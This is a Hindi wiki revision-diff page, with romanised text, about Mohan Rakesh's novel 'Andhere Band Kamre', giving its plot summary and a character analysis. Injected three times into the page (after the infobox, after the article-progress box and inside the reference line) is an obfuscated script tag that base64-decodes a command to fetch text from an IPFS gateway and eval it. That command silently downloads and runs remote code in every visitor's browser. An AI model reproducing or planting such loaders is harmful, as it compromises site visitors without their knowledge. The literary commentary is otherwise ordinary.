Difference between revisions of "अँधेरे बंद कमरे -मोहन राकेश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 26: Line 26:
 
वर्तमान भारतीय समाज का अभिजातवर्गीय नागर मन दो हिस्सों में विभाजित है- एक में है पश्चिमी आधुनिकतावाद और दूसरे में वंशानुगत संस्कारवाद। इससे इस वर्ग के भीतर जो द्वंद्व पैदा होता है, उससे पूर्वता के बीच रिक्तता, स्वच्छंदता के बीच अवरोध और प्रकाश के बीच अंधकार आ खड़ा होता है। परिणामतः व्यक्ति ऊबने लगता है, भीतर-ही-भीतर क्रोध, ईर्ष्या और संदेह जकड़ लेते हैं उसे, जैसे वह अपने ही लिए अजनबी हो। वह उठता है, और तब इसे हम हरबंस की शक्ल में पहचानते हैं। हरबंस, इस उपन्यास का केन्द्रीय पात्र है, जो दाम्पत्य संबंधों की तलाश में भटक रहा है। हरबंस और नीलिमा के माध्यम से पारस्परिक ईमानदारी, भावनात्मक लगाव और मानसिक समदृष्टि से रिक्त दांपत्य जीवन का यहाँ प्रभावशाली चित्रण हुआ है। अपनी पहचान के लिए पहचानहीन होते जा रहे भारतीय अभिजातवर्ग की भौतिक, बौद्धिक और सांस्कृतिक महत्त्वाकांक्षाओं के अँधेरे बंद, कमरों को खोलनेवाले यह उपन्यास हिंदी की गिनी-चुनी कथाकृतियों में से एक है।
 
वर्तमान भारतीय समाज का अभिजातवर्गीय नागर मन दो हिस्सों में विभाजित है- एक में है पश्चिमी आधुनिकतावाद और दूसरे में वंशानुगत संस्कारवाद। इससे इस वर्ग के भीतर जो द्वंद्व पैदा होता है, उससे पूर्वता के बीच रिक्तता, स्वच्छंदता के बीच अवरोध और प्रकाश के बीच अंधकार आ खड़ा होता है। परिणामतः व्यक्ति ऊबने लगता है, भीतर-ही-भीतर क्रोध, ईर्ष्या और संदेह जकड़ लेते हैं उसे, जैसे वह अपने ही लिए अजनबी हो। वह उठता है, और तब इसे हम हरबंस की शक्ल में पहचानते हैं। हरबंस, इस उपन्यास का केन्द्रीय पात्र है, जो दाम्पत्य संबंधों की तलाश में भटक रहा है। हरबंस और नीलिमा के माध्यम से पारस्परिक ईमानदारी, भावनात्मक लगाव और मानसिक समदृष्टि से रिक्त दांपत्य जीवन का यहाँ प्रभावशाली चित्रण हुआ है। अपनी पहचान के लिए पहचानहीन होते जा रहे भारतीय अभिजातवर्ग की भौतिक, बौद्धिक और सांस्कृतिक महत्त्वाकांक्षाओं के अँधेरे बंद, कमरों को खोलनेवाले यह उपन्यास हिंदी की गिनी-चुनी कथाकृतियों में से एक है।
 
==कथासार==
 
==कथासार==
मधुसुदन एक पत्रकार है, जो [[दिल्ली]] आकर कस्‍साबपुरा मे एक ठकुराइन के यहां बसता है। कस्‍साबपुरा मे निम्‍न समाजिक स्थिति के लोग रहते है। मधुसूदन और ठकुराइन के बीच रस रंग की बाते भी होती रहती है। मधुसुदन उस गंदे और घुटनभरे वातावरण से निकलकर कनाट प्‍लेस की चहल पहल मे रहना चाहता है। एक दिन अचानक उसकी भेंट हरबंस से हो जाती है, जिससे उनका परिचय [[बम्बई]] मे हुआ था। सूदन का परिचय, हरदल की पत्‍नी नीलिमा और उसकी सालियाँ शुक्‍ला और सरोज से हो जाता है। हरबंस उखड़ा-उखड़ा सा रहता है। यह एक कॉलेज मे अस्‍थायी रुप से पढ़ाता है, साहित्‍यकार बनने की धुन भी लगी रहती है। भारतीय इतिहास पर काम भी करता है। नीलिमा को चित्रकला मे शौक था, किन्तु धीरे-धीरे नृत्य कला की ओर उसका झुकाव हो जाता है। दिल्‍ली से भागकर हरबंस [[लन्दन]] चला जाता है और वहाँ पहुँचकर नीलिमा को आमत्रि‍त करता है। लन्‍दन पहुँचकर नीलिमा बेबी सिटिंग से तंग आकर उमादत्‍त -ट्रप के साथ पेरिस चली जाती है। ट्रप लौट आता है और नीलिमा ऊ बानू नामक एक वर्मी कलाकार के साथ दो दिन पेरिस मे रूककर पुनः लन्‍दन लौट आती है। हरबंस दिल्‍ली लौटकर अन्‍तर्राष्‍ट्रीय राजनीति, [[कला]] और सभ्‍यता के झूठे नकाब में अपने विजन को विस्‍थापित करता है। नीलिमा के असफल नृत्‍य प्रदर्शन पर प्रशंसापूर्ण टिप्‍पणियाँ छपती हैं। हरबंस उसके साथ सहयोग नहीं करता है। नीलिमा हरबंस को छोड़कर चली जाती है। हरबंस रात भर छटपटाता है और मधुसूदन रात भर उसके साथ रहता है। सवेरा होने पर दरवाजा खोलते ही वह नीलिमा को चाय बनाते देखता है। मधुसूदन ने आत्‍मकथा के रुप मे ठकुराइन, हरबंस और नीलिमा, अपनी और सुषमा श्रीवास्‍तव की कहानी कही है।<ref>{{cite web |url=http://www.favreads.in/reviews.php?id_product=191&id_product_comment=69&action=view#.UOQqnKyBWSo |title=अँधेरे बंद कमरे |accessmonthday=02 जनवरी|accessyear=2013|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
+
मधुसुदन एक पत्रकार है, जो [[दिल्ली]] आकर कस्‍साबपुरा में एक ठकुराइन के यहां बसता है। कस्‍साबपुरा में निम्‍न समाजिक स्थिति के लोग रहते है। मधुसूदन और ठकुराइन के बीच रस रंग की बाते भी होती रहती है। मधुसुदन उस गंदे और घुटनभरे वातावरण से निकलकर कनाट प्‍लेस की चहल पहल में रहना चाहता है। एक दिन अचानक उसकी भेंट हरबंस से हो जाती है, जिससे उनका परिचय [[बम्बई]] में हुआ था। सूदन का परिचय, हरदल की पत्‍नी नीलिमा और उसकी सालियाँ शुक्‍ला और सरोज से हो जाता है। हरबंस उखड़ा-उखड़ा सा रहता है। यह एक कॉलेज में अस्‍थायी रुप से पढ़ाता है, साहित्‍यकार बनने की धुन भी लगी रहती है। भारतीय इतिहास पर काम भी करता है। नीलिमा को चित्रकला में शौक था, किन्तु धीरे-धीरे नृत्य कला की ओर उसका झुकाव हो जाता है। दिल्‍ली से भागकर हरबंस [[लन्दन]] चला जाता है और वहाँ पहुँचकर नीलिमा को आमत्रि‍त करता है। लन्‍दन पहुँचकर नीलिमा बेबी सिटिंग से तंग आकर उमादत्‍त -ट्रप के साथ पेरिस चली जाती है। ट्रप लौट आता है और नीलिमा ऊ बानू नामक एक वर्मी कलाकार के साथ दो दिन पेरिस में रूककर पुनः लन्‍दन लौट आती है। हरबंस दिल्‍ली लौटकर अन्‍तर्राष्‍ट्रीय राजनीति, [[कला]] और सभ्‍यता के झूठे नकाब में अपने विजन को विस्‍थापित करता है। नीलिमा के असफल नृत्‍य प्रदर्शन पर प्रशंसापूर्ण टिप्‍पणियाँ छपती हैं। हरबंस उसके साथ सहयोग नहीं करता है। नीलिमा हरबंस को छोड़कर चली जाती है। हरबंस रात भर छटपटाता है और मधुसूदन रात भर उसके साथ रहता है। सवेरा होने पर दरवाजा खोलते ही वह नीलिमा को चाय बनाते देखता है। मधुसूदन ने आत्‍मकथा के रुप में ठकुराइन, हरबंस और नीलिमा, अपनी और सुषमा श्रीवास्‍तव की कहानी कही है।<ref name="ab">{{cite web |url=http://www.favreads.in/reviews.php?id_product=191&id_product_comment=69&action=view#.UOQqnKyBWSo |title=अँधेरे बंद कमरे |accessmonthday=02 जनवरी|accessyear=2013|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 +
==चरित्र-विधान==
 +
 
 +
हरबंस इस उपन्‍यास का नायक है और नीलिमा नायिका। अन्‍य महत्‍वपूर्ण पात्रों में लेखक स्‍वयं मधुसूदन के रुप में उपस्थित है। मधुसूदन के अतिरिक्‍त मधुसुदन के सम्‍पर्क में आने वाले अन्य पात्रों में कस्‍साबपुरा की ठकुराईन और सुषमा श्रीवास्‍तव हैं। नीलिमा और हरबंस के चरित्र को उजागर करने वाले पात्रों में मुक्‍ता, सुरजीत और ऊबानू आदि हैं। हरबंस और नीलिमा के बारे में यह आरोप लगाया है कि मधुसुदन दोनों के निकट सम्‍पर्क में रहता है, तथापि वह अपनी तथाकथित तटस्‍थ दृष्टि से उनमें से किसी भी यथार्थ को प्रस्‍फुटन करना पसन्‍द नहीं करता। यह केवल अलग-अलग शीशों में झलकते हुए उनके विभिन्न प्रतिबिम्‍बों की प्रक्षिप्‍त करता हुआ चलता है। फल यह देखने में आता है कि दोनों में से एक का भी व्‍यक्तित्‍व सुस्‍पष्‍ट, सजीव और मूर्त रुप में पाठकों के आगे प्रस्फुटित नहीं हो पाता। दोनों जैसे पुआल के बने स्प्रिगदार पुतले हों, जिन्‍हें ऊपर से अनमने ढंग से सजाकर लेखक इच्‍छानुसार नचाता चलता है। यह आक्षेप हरबंस के बारे में सही है, किन्तु नीलिमा के बारे में सत्‍य नहीं है। हरबंस दुहरे व्‍यक्तित्‍व का प्राणी है, जिसके व्‍यक्तित्‍व का गठन एकात्‍मक रुप से नहीं हुआ है। कभी यह नीलिमा के समक्ष झुकता है और कभी उपेक्षा करता है। नीलिमा से भागता है और कभी अपने पास बुलाता है। नीलिमा में संवेदनशीलता है, कलाकार बनने की कामना होते हुए भी नारीत्व है। पत्‍नीत्‍व का उसमें अभाव है, किन्‍तु संवेदना का नहीं। नीलिमा निश्चित रूप से प्राणवान नारी पात्र है। नीलिमा से भी अधिक प्राणवान पात्र कस्‍सावपुरे की ठकुराइन है। उसकी सजीवता और प्राणता पाठक के मन को गुदगुदाती है। कस्‍सावपुरे की ठकुराइन की कथा के विकास में महत्‍वपूर्ण हाथ नहीं है, इसलिए उसका विकास भी नहीं हो सका है। शुक्‍ला और सुरजीत सफल दाम्‍पत्य के प्रतीक हैं। मधुसूदन के जीवन में दो विरोधी पात्र आते हैं, जो विरोधी जीवन पद्धतियों के प्रतीक हैं, कस्‍सावपुरे की ठकुराइन निम्‍न वर्ग का प्रतिनिधित्‍व करती है और सुषमा श्रीवास्‍तव अभिजात्य वर्ग का। ऊ बानू में तो व्‍यक्तित्‍व है ही नहीं। वह तो नीलिमा का पालतू कुत्‍ता प्रतीत होता है। दार्शनिक जटिलताओं के पात्रों के प्राणों का स्‍पन्‍दन दब जाता है, किन्‍तु उपन्‍यास में दार्शनिक जटिलताओं के होते हुए भी अनुभूतिशीलता होने के कारण हरबंस आदि को छोडकर सभी पात्र सप्राण हैं।<ref name="ab"/>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 13:35, 2 January 2013

aandhere band kamare -mohan rakesh
lekhak mohan rakesh
mool shirshak aandhere band kamare
prakashak rajakamal prakashan
prakashan tithi 1 janavari, 2003
ISBN 81-267-0074-2
desh bharat
prishth: 330
bhasha hindi
prakar upanyas

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


aandhere band kamare prasiddh sahityakar aur natakakar mohan rakesh dvara rachit upanyas hai. isaka prakashan 1 janavari, 2003 ko 'rajakamal prakashan' dvara hua tha.

vartaman bharatiy samaj ka abhijatavargiy nagar man do hissoan mean vibhajit hai- ek mean hai pashchimi adhunikatavad aur doosare mean vanshanugat sanskaravad. isase is varg ke bhitar jo dvandv paida hota hai, usase poorvata ke bich riktata, svachchhandata ke bich avarodh aur prakash ke bich aandhakar a kh da hota hai. parinamatah vyakti oobane lagata hai, bhitar-hi-bhitar krodh, eershya aur sandeh jak d lete haian use, jaise vah apane hi lie ajanabi ho. vah uthata hai, aur tab ise ham harabans ki shakl mean pahachanate haian. harabans, is upanyas ka kendriy patr hai, jo dampaty sanbandhoan ki talash mean bhatak raha hai. harabans aur nilima ke madhyam se parasparik eemanadari, bhavanatmak lagav aur manasik samadrishti se rikt daanpaty jivan ka yahaan prabhavashali chitran hua hai. apani pahachan ke lie pahachanahin hote ja rahe bharatiy abhijatavarg ki bhautik, bauddhik aur saanskritik mahattvakaankshaoan ke aandhere band, kamaroan ko kholanevale yah upanyas hiandi ki gini-chuni kathakritiyoan mean se ek hai.

kathasar

madhusudan ek patrakar hai, jo dilli akar kash‍sabapura mean ek thakurain ke yahaan basata hai. kash‍sabapura mean nimh‍n samajik sthiti ke log rahate hai. madhusoodan aur thakurain ke bich ras rang ki bate bhi hoti rahati hai. madhusudan us gande aur ghutanabhare vatavaran se nikalakar kanat ph‍les ki chahal pahal mean rahana chahata hai. ek din achanak usaki bheant harabans se ho jati hai, jisase unaka parichay bambee mean hua tha. soodan ka parichay, haradal ki path‍ni nilima aur usaki saliyaan shukh‍la aur saroj se ho jata hai. harabans ukh da-ukh da sa rahata hai. yah ek k aaulej mean ash‍thayi rup se padhata hai, sahith‍yakar banane ki dhun bhi lagi rahati hai. bharatiy itihas par kam bhi karata hai. nilima ko chitrakala mean shauk tha, kintu dhire-dhire nrity kala ki or usaka jhukav ho jata hai. dilh‍li se bhagakar harabans landan chala jata hai aur vahaan pahuanchakar nilima ko amatri‍t karata hai. lanh‍dan pahuanchakar nilima bebi sitiang se tang akar umadath‍t -trap ke sath peris chali jati hai. trap laut ata hai aur nilima oo banoo namak ek varmi kalakar ke sath do din peris mean rookakar punah lanh‍dan laut ati hai. harabans dilh‍li lautakar anh‍tarrashh‍triy rajaniti, kala aur sabhh‍yata ke jhoothe nakab mean apane vijan ko vish‍thapit karata hai. nilima ke asaphal nrith‍y pradarshan par prashansapoorn tiph‍paniyaan chhapati haian. harabans usake sath sahayog nahian karata hai. nilima harabans ko chho dakar chali jati hai. harabans rat bhar chhatapatata hai aur madhusoodan rat bhar usake sath rahata hai. savera hone par daravaja kholate hi vah nilima ko chay banate dekhata hai. madhusoodan ne ath‍makatha ke rup mean thakurain, harabans aur nilima, apani aur sushama shrivash‍tav ki kahani kahi hai.[1]

charitr-vidhan

harabans is upanh‍yas ka nayak hai aur nilima nayika. anh‍y mahath‍vapoorn patroan mean lekhak sh‍vayan madhusoodan ke rup mean upasthit hai. madhusoodan ke atirikh‍t madhusudan ke samh‍park mean ane vale any patroan mean kash‍sabapura ki thakuraeen aur sushama shrivash‍tav haian. nilima aur harabans ke charitr ko ujagar karane vale patroan mean mukh‍ta, surajit aur oobanoo adi haian. harabans aur nilima ke bare mean yah arop lagaya hai ki madhusudan donoan ke nikat samh‍park mean rahata hai, tathapi vah apani tathakathit tatash‍th drishti se unamean se kisi bhi yatharth ko prash‍phutan karana pasanh‍d nahian karata. yah keval alag-alag shishoan mean jhalakate hue unake vibhinn pratibimh‍boan ki prakshiph‍t karata hua chalata hai. phal yah dekhane mean ata hai ki donoan mean se ek ka bhi vh‍yaktith‍v sush‍pashh‍t, sajiv aur moort rup mean pathakoan ke age prasphutit nahian ho pata. donoan jaise pual ke bane sprigadar putale hoan, jinh‍hean oopar se anamane dhang se sajakar lekhak ichh‍chhanusar nachata chalata hai. yah akshep harabans ke bare mean sahi hai, kintu nilima ke bare mean sath‍y nahian hai. harabans duhare vh‍yaktith‍v ka prani hai, jisake vh‍yaktith‍v ka gathan ekath‍mak rup se nahian hua hai. kabhi yah nilima ke samaksh jhukata hai aur kabhi upeksha karata hai. nilima se bhagata hai aur kabhi apane pas bulata hai. nilima mean sanvedanashilata hai, kalakar banane ki kamana hote hue bhi naritv hai. path‍nith‍v ka usamean abhav hai, kinh‍tu sanvedana ka nahian. nilima nishchit roop se pranavan nari patr hai. nilima se bhi adhik pranavan patr kash‍savapure ki thakurain hai. usaki sajivata aur pranata pathak ke man ko gudagudati hai. kash‍savapure ki thakurain ki katha ke vikas mean mahath‍vapoorn hath nahian hai, isalie usaka vikas bhi nahian ho saka hai. shukh‍la aur surajit saphal damh‍paty ke pratik haian. madhusoodan ke jivan mean do virodhi patr ate haian, jo virodhi jivan paddhatiyoan ke pratik haian, kash‍savapure ki thakurain nimh‍n varg ka pratinidhith‍v karati hai aur sushama shrivash‍tav abhijaty varg ka. oo banoo mean to vh‍yaktith‍v hai hi nahian. vah to nilima ka palatoo kuth‍ta pratit hota hai. darshanik jatilataoan ke patroan ke pranoan ka sh‍panh‍dan dab jata hai, kinh‍tu upanh‍yas mean darshanik jatilataoan ke hote hue bhi anubhootishilata hone ke karan harabans adi ko chhodakar sabhi patr sapran haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 aandhere band kamare (hindi). . abhigaman tithi: 02 janavari, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh